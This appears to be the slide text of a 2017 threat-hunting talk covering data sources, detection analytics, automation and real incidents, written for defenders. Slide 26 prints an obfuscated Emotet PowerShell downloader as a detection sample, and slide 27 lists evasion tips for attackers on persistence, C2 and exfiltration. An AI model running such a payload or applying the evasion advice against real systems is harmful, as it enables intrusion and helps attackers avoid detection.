Over the last few years threat hunting has risen from being a grassroots hands-on defensive technique to all-out hype as security vendors have jumped on the bandwagon. In this talk I wanted to strip away the marketing and talk about real-life threat hunting at scale and how it differs from traditional security monitoring. I'll cover the key datasets, different analytical approaches, cutting-edge TTPs and the people/skills needed to make it happen. I'll also share some real-world compromises that would have been missed by traditional detection but were found through hands-on threat hunting.

1. HUNT OR BE HUNTED
7th June 2017

2. • Senior Threat Hunter @ Countercept
• Pentester + Defensive fanboi
• Bug Bounty Lover <3
• Blogger? @pwndizzle
WHOAMI

3. Threat hunting when you don’t know you’re threat hunting…

4. “THE PROCESS OF PROACTIVELY AND
ITERATIVELY SEARCHING THROUGH
NETWORKS TO DETECT AND ISOLATE
ADVANCED THREATS THAT EVADE
EXISTING SECURITY SOLUTIONS”
- SQRRL
What is threat hunting?

5. Manual
Alerts from
“products” (AV)
Semi-AutomatedFully Automated
Manual Threat
Hunting
Assisted Hunts
Vuln Scanners
(Nessus)
Manual
Pentesting
Tools (nmap)
Advanced
Threat Hunting
Traditional
security teams
Manual vs Automated
OFFENCE
DEFENCE

6. TacticalThreatIntel
10%
40%
80%
99%
AUTOMATED NOTIFICATION
AUTOMATION
Capability
‘HUNTING USE CASE’
GENERATION (HYPOTHESIS)
‘HUNTING USE CASE’
EXECUTION
The Paris Model
(or Hunting Rocket, or APT Eiffel Tower)

7. Process
• Red team use-case: HTA w/PS payload
• Manual hunt: mshta.exe usage, PS script logging
• Automated hunt: suspicious processes/script analysis
• Refine automation (increase fidelity): Filtering/Enrichment
Requirements
• People: someone needs to know this technique, understand it enough
to search and automate
• Tech: endpoint visibility required + automated analysis framework.
Paris Model In Action

9. Where do I start?

11. What data sources?

13. Payload
executed
Data
exfiltrated
Persistence
installed
Escalated
Privs
Lateral
movement
Payload
delivered
• Email Filter
• Web Proxy
• Bro Logs
• Firewall
• Endpoint
• Windows/Linux logs
• AV logs
• Bro Logs
• Web Proxy
• App Logs

14. How to do analysis?

15. IOCs are bad*
*If you rely on IOCs as your primary detection technique

16. Specific Attacker TTPs
• Anomaly or context driven
• Windows – Logins, DCSync, PrivEsc,
Lockouts
• Binaries
• Execution – cmd, ps,
wscript, wmi
• Enumeration - net
• Persistence – schtasks,
services, registry, cron
• In-Memory injection
• Privilege Escalation
• UAC Bypass
Endpoint
Logs Network
• Domain classification/history/age
• File analysis - Extension, Content-
type, Content, Mismatches
• Data Transfers –
Uploads/Downloads
• Dynamic DNS usage
• DNS Tunneling

17. In-Memory Injection
Detection
• Suspicious threads
• Unknown module
• Unusual Permissions (e.g. RWX)
• Check for MZ
• Check for PE Header
• Check for MS-DOS strings
Injection Techniques
• LoadLibrary
• Process Hollowing
• Reflective Loading
• Hooking
Advanced Attack Detection @ Securitay2017 -
https://youtu.be/ihElrBBJQo8

18. Least Frequency Analysis/Stacking
Frequency
Count
Highest Frequency
Process Name Count
conhost.exe 11730618
cscript.exe 9819507
cmd.exe 1497875
WmiPrvSE.exe 1444628
dllhost.exe 579741
Lowest Frequency
Process Name Count
hpzpsl01.exe 1
ismagent.exe 1
MSIAE02.tmp 1
dJK4oMMtx.exe 1
SketchUp.exe 1
Anomalies
That’s a bit weird

19. Relationships/Graphing

20. Clustering/Behaviour Based Detection
https://countercept.com/our-thinking/machine-learning/

21. Automation

22. Efficiency is intelligent laziness

23. Speeding it up
• Data analysis with scoring/rules
(“Assisted Hunts”)
• Enrichment/Context
• Integrated prevention/response
• Ticketing – Creation, Updating,
Closing
• Payload Analysis – VT and Cuckoo
integration, IDA/Radare plugins
• Comms with other users/clients
(https://github.com/dropbox/securitybot)

24. Welcome to the
real world…

25. • Targeting ATM management systems! :O
Example #1 – Don’t trust your admins
• Lateral movement using “Advanced IP Scanner”
• History of deployment, 1 host, 5 hosts, 27 hosts.
• Compiled Python binary with key-logging capabilities
• Suspicious executable bstack.exe running from StartUp folder

26. Example #2 – Emotet - Macros+Powershell <3
Scoring
• Hidden Window (3/10)
• WebClient Download File (10/10)
• URL in args (7/10)
• Start-Process (8/10)
• Network comms/File writes (9/10)
IEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-
101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-
93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-
104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-
110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m3
9_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-
45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-
32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-
39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-
103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-
39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-
116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-
39_43t39V45m39t43Q39_101Q98}103_48-
32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-
39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115
_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT(
'{_Q-@t}mXV' ) |ForEach-Object { ([Int]$_ -AS [Char]) } ) -Join'' )
• IEX (9/10)
• Letter/Number/Special Char
Ratios (8/10)
• Decoder Stub (7/10)
• Length (8/10)
https://github.com/danielbohannon/Invoke-Obfuscation

27. How to be a stealthier attacker
Foothold
Execution
Persistence
C2/Exfil
• Avoid SysInternals Autoruns - Scheduled Tasks, Services, Registry, Cron,
Launch Daemons/Agents
• WMI and COM not perfect but better than others
• Use “hide in plain sight” techniques
• Outlook rules, Office templates
• DLL side-loading
• Rootkits
• Anything involving custom applications
• Don’t use persistence if you don’t need to!
• Avoid network comms from processes which don’t have network comms
• Avoid newly registered domains, if possible use Google/Twitter/Youtube etc.
• Avoid DNS tunneling
• Use SSL and outlook/browsers where possible and go low and slow
• Avoid new processes and avoid using command line arguments
• Avoid Windows utilities – cmd, powershell, net, reg, etc.
• Avoid in-memory techniques
• Avoid “hacker tools” – Metasploit, CobaltStrike, Mimikatz
• Avoid “spraying” credentials
• WMI is a better option
• Use direct Windows API access where possible
• Modify tools/binaries – name, hash, description
• Avoid macros/hta files
• Social engineering, exploits, webapps are better
• Abuse third party services Facebook/Linkedin
• Target personal assets instead of corporate assets

28. • Data – OSQuery, GRR, Sysmon, Bro,
Event logs
• Storage – Elastic
• Analytics - ElasticDSL, Kibana,
ElastAlert, 411
• Infrastructure – Puppet, Chef, Ansible,
Docker
DIY Detection

29. But what about
CVE-2017-0144?!
Blue is the new red…

30. QUESTIONS?